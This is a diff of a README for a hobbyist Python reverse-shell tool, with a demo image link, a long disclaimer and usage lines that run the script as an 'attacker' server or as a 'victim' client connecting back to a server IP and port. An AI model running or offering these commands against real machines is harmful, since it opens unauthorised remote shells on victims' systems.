heecheon92/Python/README.md

-Disclaimer: I am not responsible for any real / potential damage by the use of this project

 # Sample Demo:
 ![Alt Text](https://github.com/heecheon92/Reverse_shell/blob/master/rshell_demo.png)

+# How to Use?

+You can run this program either as a server (attacker) or client (victim)

+To run as a server:

+  python3 rshell.py -m server -p port_number

+To run as a client:

+  python3 rshell.py -m client -t server_ip_address -p server_port_number

+# A Very Long Disclaimer:

+I am not responsible for any real / potential damage by the use of this project

 I am not a professional penetration tester.

 However, I do find network/socket programming very attractive and based on what I learned from

-Network class in college, I have made this little sneaky programs.
+network class in college and socket programming I picked up from somewhere, I have made this little sneaky programs.

 Just because I like to understand about penetration testing, it does not mean I would like to relentlessly abuse well known tools or frameworks (such as metasploit....veil....sqlmap.....hashcat.....etc).
 Instead, I wanted to try making my own script and see what I can do.
 I am not saying those penetration tools are bad.
 In fact, I get amazed how well they are automated to attack mutliple victim nodes.
 I just do not want to solely rely on them.